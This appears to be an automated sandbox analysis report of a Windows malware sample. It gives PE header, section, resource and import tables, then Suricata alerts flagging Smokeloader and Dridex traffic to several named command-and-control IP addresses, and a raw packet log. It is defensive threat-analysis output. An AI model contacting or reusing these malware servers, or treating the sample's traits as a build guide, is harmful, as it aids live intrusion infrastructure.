                                                                                                                                                              mov ebp, esp
                                                                                                                                                              sub esp, 00000328h
                                                                                                                                                              mov dword ptr [0041E858h], eax
                                                                                                                                                              mov dword ptr [0041E854h], ecx
                                                                                                                                                              mov dword ptr [0041E850h], edx
                                                                                                                                                              mov dword ptr [0041E84Ch], ebx
                                                                                                                                                              mov dword ptr [0041E848h], esi
                                                                                                                                                              mov dword ptr [0041E844h], edi
                                                                                                                                                              mov word ptr [0041E870h], ss
                                                                                                                                                              mov word ptr [0041E864h], cs
                                                                                                                                                              mov word ptr [0041E840h], ds
                                                                                                                                                              mov word ptr [0041E83Ch], es
                                                                                                                                                              mov word ptr [0041E838h], fs
                                                                                                                                                              mov word ptr [0041E834h], gs
                                                                                                                                                              pushfd
                                                                                                                                                              pop dword ptr [0041E868h]
                                                                                                                                                              mov eax, dword ptr [ebp+00h]
                                                                                                                                                              mov dword ptr [0041E85Ch], eax
                                                                                                                                                              mov eax, dword ptr [ebp+04h]
                                                                                                                                                              mov dword ptr [0041E860h], eax
                                                                                                                                                              lea eax, dword ptr [ebp+08h]
                                                                                                                                                              mov dword ptr [0041E86Ch], eax
                                                                                                                                                              mov eax, dword ptr [ebp-00000320h]
                                                                                                                                                              mov dword ptr [0041E7A8h], 00010001h
                                                                                                                                                              mov eax, dword ptr [0041E860h]
                                                                                                                                                              mov dword ptr [0041E75Ch], eax
                                                                                                                                                              mov dword ptr [0041E750h], C0000409h
                                                                                                                                                              mov dword ptr [0041E754h], 00000001h
                                                                                                                                                              mov eax, dword ptr [0041D004h]
                                                                                                                                                              mov dword ptr [ebp-00000328h], eax
                                                                                                                                                              mov eax, dword ptr [0041D008h]
                                                                                                                                                              mov dword ptr [ebp-00000324h], eax
                                                                                                                                                              call dword ptr [000000CCh]
                                                                                                                                                              Programming Language:
                                                                                                                                                              • [C++] VS2008 build 21022
                                                                                                                                                              • [ASM] VS2008 build 21022
                                                                                                                                                              • [ C ] VS2008 build 21022
                                                                                                                                                              • [IMP] VS2005 build 50727
                                                                                                                                                              • [RES] VS2008 build 21022
                                                                                                                                                              • [LNK] VS2008 build 21022
                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x1b7740x50.rdata
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1160000x1f970.rsrc
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x1b4800x18.rdata
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x1a0000x18c.rdata
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                              .text0x10000x180cf0x18200ddb890e91cb3c4094add24332f80eb96False0.792159164507772data7.489225566155988IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                              .rdata0x1a0000x20900x2200939e421469750d3b1515766a2170fd78False0.36638327205882354data5.489393579322007IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                              .data0x1d0000xf7ff80x18000494fbbd3a000ed0f437f8b249b479dbFalse0.2591145833333333data2.663555604464713IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                              .tls0x1150000x51d0x60053e979547d8c2ea86560ac45de08ae25False0.013020833333333334data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                              .rsrc0x1160000x1f9700x1fa008e3f0e050d28a9d06a9b83ddd39d11b8False0.41916532855731226data5.111460066928023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                              AFX_DIALOG_LAYOUT0x12e1780x2data5.0
                                                                                                                                                              BUXILODUGEDUPUCEGAT0x12d5800xbf7ASCII text, with very long lines (3063), with no line terminatorsTurkishTurkey0.6000652954619654
                                                                                                                                                              RT_CURSOR0x12e1800x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.7368421052631579
                                                                                                                                                              RT_CURSOR0x12e2b00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.06130705394190871
                                                                                                                                                              RT_ICON0x116b100xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.5738272921108742
                                                                                                                                                              RT_ICON0x1179b80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.6502707581227437
                                                                                                                                                              RT_ICON0x1182600x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.7056451612903226
                                                                                                                                                              RT_ICON0x1189280x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.7557803468208093
                                                                                                                                                              RT_ICON0x118e900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkishTurkey0.5276970954356847
                                                                                                                                                              RT_ICON0x11b4380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkishTurkey0.6343808630393997
                                                                                                                                                              RT_ICON0x11c4e00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkishTurkey0.6442622950819672
                                                                                                                                                              RT_ICON0x11ce680x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkishTurkey0.7774822695035462
                                                                                                                                                              RT_ICON0x11d3480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.3427505330490405
                                                                                                                                                              RT_ICON0x11e1f00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.5311371841155235
                                                                                                                                                              RT_ICON0x11ea980x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.6123271889400922
                                                                                                                                                              RT_ICON0x11f1600x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.6654624277456648
                                                                                                                                                              RT_ICON0x11f6c80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TurkishTurkey0.4285269709543568
                                                                                                                                                              RT_ICON0x121c700x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.5159836065573771
                                                                                                                                                              RT_ICON0x1225f80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.5132978723404256
                                                                                                                                                              RT_ICON0x122ac80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.39712153518123666
                                                                                                                                                              RT_ICON0x1239700x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.5582129963898917
                                                                                                                                                              RT_ICON0x1242180x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.6267281105990783
                                                                                                                                                              RT_ICON0x1248e00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.6416184971098265
                                                                                                                                                              RT_ICON0x124e480x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.4477016885553471
                                                                                                                                                              RT_ICON0x125ef00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.43934426229508194
                                                                                                                                                              RT_ICON0x1268780x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.48138297872340424
                                                                                                                                                              RT_ICON0x126d480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.3307569296375267
                                                                                                                                                              RT_ICON0x127bf00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.40252707581227437
                                                                                                                                                              RT_ICON0x1284980x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.3986175115207373
                                                                                                                                                              RT_ICON0x128b600x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.40534682080924855
                                                                                                                                                              RT_ICON0x1290c80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TurkishTurkey0.15809128630705394
                                                                                                                                                              RT_ICON0x12b6700x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TurkishTurkey0.17847091932457787
                                                                                                                                                              RT_ICON0x12c7180x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TurkishTurkey0.21147540983606558
                                                                                                                                                              RT_ICON0x12d0a00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TurkishTurkey0.23670212765957446
                                                                                                                                                              RT_STRING0x130a280x404data0.4494163424124514
                                                                                                                                                              RT_STRING0x130e300x568data0.4407514450867052
                                                                                                                                                              RT_STRING0x1313980x532data0.44511278195488724
                                                                                                                                                              RT_STRING0x1318d00x7bcdata0.4222222222222222
                                                                                                                                                              RT_STRING0x1320900x92adata0.4121909633418585
                                                                                                                                                              RT_STRING0x1329c00x700data0.4291294642857143
                                                                                                                                                              RT_STRING0x1330c00x524data0.45440729483282677
                                                                                                                                                              RT_STRING0x1335e80x708data0.4272222222222222
                                                                                                                                                              RT_STRING0x133cf00x75edata0.4236479321314952
                                                                                                                                                              RT_STRING0x1344500x730data0.4260869565217391
                                                                                                                                                              RT_STRING0x134b800x842data0.4195837275307474
                                                                                                                                                              RT_STRING0x1353c80x506data0.4432348367029549
                                                                                                                                                              RT_STRING0x1358d00x9cdata0.6025641025641025
                                                                                                                                                              RT_GROUP_CURSOR0x1308580x22data1.088235294117647
                                                                                                                                                              RT_GROUP_ICON0x122a600x68dataTurkishTurkey0.7019230769230769
                                                                                                                                                              RT_GROUP_ICON0x12d5080x76dataTurkishTurkey0.6779661016949152
                                                                                                                                                              RT_GROUP_ICON0x11d2d00x76dataTurkishTurkey0.6610169491525424
                                                                                                                                                              RT_GROUP_ICON0x126ce00x68dataTurkishTurkey0.7211538461538461
                                                                                                                                                              RT_VERSION0x1308800x1a8data0.5825471698113207
                                                                                                                                                              DLLImport
                                                                                                                                                              KERNEL32.dllSetPriorityClass, GetNumaProcessorNode, OpenJobObjectA, ReadConsoleA, QueryDosDeviceA, GetEnvironmentStringsW, WaitForSingleObject, InterlockedCompareExchange, GetComputerNameW, GetNumaAvailableMemoryNode, BackupSeek, FreeEnvironmentStringsA, GetModuleHandleW, GetConsoleAliasesLengthA, GlobalAlloc, GetVolumeInformationA, GetConsoleMode, GetConsoleAliasExesLengthW, GetSystemTimeAdjustment, WriteConsoleOutputA, HeapDestroy, GetFileAttributesA, GetBinaryTypeA, SearchPathW, GetStdHandle, GetLastError, GetProcAddress, MoveFileW, SearchPathA, LoadLibraryA, LocalAlloc, SetCalendarInfoW, SetCommMask, CreatePipe, GetDefaultCommConfigA, BuildCommDCBA, PurgeComm, FatalAppExitA, WriteConsoleOutputAttribute, FindAtomW, CopyFileExA, GetModuleFileNameW, GetCommandLineW, HeapFree, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapAlloc, VirtualAlloc, HeapReAlloc, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, Sleep, HeapSize, ExitProcess, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, WriteFile, GetModuleFileNameA, FreeEnvironmentStringsW, SetHandleCount, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, RtlUnwind, LCMapStringA, WideCharToMultiByte, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetModuleHandleA
                                                                                                                                                              USER32.dllGetUserObjectInformationW, SetFocus
                                                                                                                                                              ADVAPI32.dllObjectPrivilegeAuditAlarmA
                                                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                                                              TurkishTurkey
                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                              2024-09-30T15:37:52.397966+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849706187.228.112.17580TCP
                                                                                                                                                              2024-09-30T15:37:53.550741+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849707187.228.112.17580TCP
                                                                                                                                                              2024-09-30T15:37:54.522033+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849708187.228.112.17580TCP
                                                                                                                                                              2024-09-30T15:37:55.560773+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849709187.228.112.17580TCP
                                                                                                                                                              2024-09-30T15:37:56.721574+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849710187.228.112.17580TCP
                                                                                                                                                              2024-09-30T15:37:57.725587+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849711187.228.112.17580TCP
                                                                                                                                                              2024-09-30T15:37:58.851638+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849712187.228.112.17580TCP
                                                                                                                                                              2024-09-30T15:37:59.878104+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849713187.228.112.17580TCP
                                                                                                                                                              2024-09-30T15:38:00.864999+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849714187.228.112.17580TCP
                                                                                                                                                              2024-09-30T15:38:01.850458+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849715187.228.112.17580TCP
                                                                                                                                                              2024-09-30T15:38:03.027320+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849716187.228.112.17580TCP
                                                                                                                                                              2024-09-30T15:38:03.993808+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849717187.228.112.17580TCP
                                                                                                                                                              2024-09-30T15:38:04.972429+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849718187.228.112.17580TCP
                                                                                                                                                              2024-09-30T15:38:05.963208+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849719187.228.112.17580TCP
                                                                                                                                                              2024-09-30T15:38:06.991497+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849720187.228.112.17580TCP
                                                                                                                                                              2024-09-30T15:38:07.970450+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849721187.228.112.17580TCP
                                                                                                                                                              2024-09-30T15:38:08.937819+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849722187.228.112.17580TCP
                                                                                                                                                              2024-09-30T15:38:09.905426+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849723187.228.112.17580TCP
                                                                                                                                                              2024-09-30T15:38:10.885092+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849724187.228.112.17580TCP
                                                                                                                                                              2024-09-30T15:38:11.851843+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849725187.228.112.17580TCP
                                                                                                                                                              2024-09-30T15:38:17.653595+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849728187.228.112.17580TCP
                                                                                                                                                              2024-09-30T15:38:18.643607+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849729187.228.112.17580TCP
                                                                                                                                                              2024-09-30T15:38:19.631633+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849730187.228.112.17580TCP
                                                                                                                                                              2024-09-30T15:38:21.247631+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849731187.228.112.17580TCP
                                                                                                                                                              2024-09-30T15:38:22.219164+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849732187.228.112.17580TCP
                                                                                                                                                              2024-09-30T15:38:23.194439+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849733187.228.112.17580TCP
                                                                                                                                                              2024-09-30T15:38:24.808335+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849734187.228.112.17580TCP
                                                                                                                                                              2024-09-30T15:38:26.006013+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849735187.228.112.17580TCP
                                                                                                                                                              2024-09-30T15:38:26.988643+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849736187.228.112.17580TCP
                                                                                                                                                              2024-09-30T15:38:27.988458+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849737187.228.112.17580TCP
                                                                                                                                                              2024-09-30T15:38:44.499108+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.84973823.145.40.162443TCP
                                                                                                                                                              2024-09-30T15:38:44.836500+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.84973823.145.40.162443TCP
                                                                                                                                                              2024-09-30T15:38:44.970431+02002829848ETPRO MALWARE SmokeLoader encrypted module (3)223.145.40.162443192.168.2.849738TCP
                                                                                                                                                              2024-09-30T15:38:45.886177+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.84973923.145.40.162443TCP
                                                                                                                                                              2024-09-30T15:38:46.251562+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.84973923.145.40.162443TCP
                                                                                                                                                              2024-09-30T15:38:46.894888+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.84974023.145.40.162443TCP
                                                                                                                                                              2024-09-30T15:38:47.176802+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.84974023.145.40.162443TCP
                                                                                                                                                              2024-09-30T15:38:47.794779+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.84974123.145.40.162443TCP
                                                                                                                                                              2024-09-30T15:38:48.079552+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.84974123.145.40.162443TCP
                                                                                                                                                              2024-09-30T15:38:48.830258+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.84974223.145.40.162443TCP
                                                                                                                                                              2024-09-30T15:38:49.104360+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.84974223.145.40.162443TCP
                                                                                                                                                              2024-09-30T15:38:50.503370+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.84974323.145.40.162443TCP
                                                                                                                                                              2024-09-30T15:38:51.323680+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.84974323.145.40.162443TCP
                                                                                                                                                              2024-09-30T15:38:52.011851+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.84974423.145.40.162443TCP
                                                                                                                                                              2024-09-30T15:38:52.294530+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.84974423.145.40.162443TCP
                                                                                                                                                              2024-09-30T15:38:52.984161+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.84974523.145.40.162443TCP
                                                                                                                                                              2024-09-30T15:38:53.297588+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.84974523.145.40.162443TCP
                                                                                                                                                              2024-09-30T15:38:53.912532+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.84974623.145.40.162443TCP
                                                                                                                                                              2024-09-30T15:38:54.205270+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.84974623.145.40.162443TCP
                                                                                                                                                              2024-09-30T15:38:54.938562+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.84974723.145.40.162443TCP
                                                                                                                                                              2024-09-30T15:38:55.243276+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.84974723.145.40.162443TCP
                                                                                                                                                              2024-09-30T15:38:56.246553+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.84974823.145.40.162443TCP
                                                                                                                                                              2024-09-30T15:38:56.520099+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.84974823.145.40.162443TCP
                                                                                                                                                              2024-09-30T15:38:57.222508+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.84974923.145.40.162443TCP
                                                                                                                                                              2024-09-30T15:38:57.565466+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.84974923.145.40.162443TCP
                                                                                                                                                              2024-09-30T15:39:03.093048+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.84975023.145.40.162443TCP
                                                                                                                                                              2024-09-30T15:39:03.458246+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.84975023.145.40.162443TCP
                                                                                                                                                              2024-09-30T15:39:34.947698+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849751187.228.112.17580TCP
                                                                                                                                                              2024-09-30T15:39:36.916354+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849752187.228.112.17580TCP
                                                                                                                                                              2024-09-30T15:39:40.479139+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849753187.228.112.17580TCP
                                                                                                                                                              2024-09-30T15:39:47.650001+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849754187.228.112.17580TCP
                                                                                                                                                              2024-09-30T15:39:57.130255+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849755187.228.112.17580TCP
                                                                                                                                                              2024-09-30T15:40:09.910486+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849756187.228.112.17580TCP
                                                                                                                                                              2024-09-30T15:40:17.577744+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.84975723.145.40.162443TCP
                                                                                                                                                              2024-09-30T15:40:17.914963+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.84975723.145.40.162443TCP
                                                                                                                                                              2024-09-30T15:40:24.269864+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849758109.121.204.1480TCP
                                                                                                                                                              2024-09-30T15:40:37.644731+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.84975923.145.40.162443TCP
                                                                                                                                                              2024-09-30T15:40:38.006496+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.84975923.145.40.162443TCP
                                                                                                                                                              2024-09-30T15:40:46.200997+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849760109.121.204.1480TCP
                                                                                                                                                              2024-09-30T15:40:59.327335+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.84976123.145.40.162443TCP
                                                                                                                                                              2024-09-30T15:40:59.669661+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.84976123.145.40.162443TCP
                                                                                                                                                              2024-09-30T15:41:09.207582+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849762109.121.204.1480TCP
                                                                                                                                                              2024-09-30T15:41:22.625430+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.84976323.145.40.162443TCP
                                                                                                                                                              2024-09-30T15:41:22.977909+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.84976323.145.40.162443TCP
                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                              Sep 30, 2024 15:37:51.351717949 CEST4970680192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:37:51.356601000 CEST8049706187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:37:51.359405041 CEST4970680192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:37:51.359580994 CEST4970680192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:37:51.359603882 CEST4970680192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:37:51.364371061 CEST8049706187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:37:51.364624977 CEST8049706187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:37:52.397855997 CEST8049706187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:37:52.397916079 CEST8049706187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:37:52.397948980 CEST8049706187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:37:52.397965908 CEST4970680192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:37:52.398004055 CEST4970680192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:37:52.399343967 CEST4970680192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:37:52.402858973 CEST4970780192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:37:52.404179096 CEST8049706187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:37:52.407969952 CEST8049707187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:37:52.408041954 CEST4970780192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:37:52.408180952 CEST4970780192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:37:52.408200026 CEST4970780192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:37:52.413156033 CEST8049707187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:37:52.413320065 CEST8049707187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:37:53.547043085 CEST8049707187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:37:53.547375917 CEST8049707187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:37:53.550740957 CEST4970780192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:37:53.550914049 CEST4970780192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:37:53.553389072 CEST4970880192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:37:53.555711031 CEST8049707187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:37:53.558393002 CEST8049708187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:37:53.558505058 CEST4970880192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:37:53.558628082 CEST4970880192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:37:53.558648109 CEST4970880192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:37:53.563489914 CEST8049708187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:37:53.563505888 CEST8049708187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:37:54.521413088 CEST8049708187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:37:54.521955967 CEST8049708187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:37:54.522032976 CEST4970880192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:37:54.526923895 CEST4970880192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:37:54.531761885 CEST8049708187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:37:54.576423883 CEST4970980192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:37:54.581444025 CEST8049709187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:37:54.581522942 CEST4970980192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:37:54.581722021 CEST4970980192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:37:54.581734896 CEST4970980192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:37:54.586617947 CEST8049709187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:37:54.586711884 CEST8049709187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:37:55.560359001 CEST8049709187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:37:55.560703039 CEST8049709187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:37:55.560772896 CEST4970980192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:37:55.572129011 CEST4970980192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:37:55.576958895 CEST8049709187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:37:55.579225063 CEST4971080192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:37:55.584027052 CEST8049710187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:37:55.584098101 CEST4971080192.168.2.8187.228.112.175
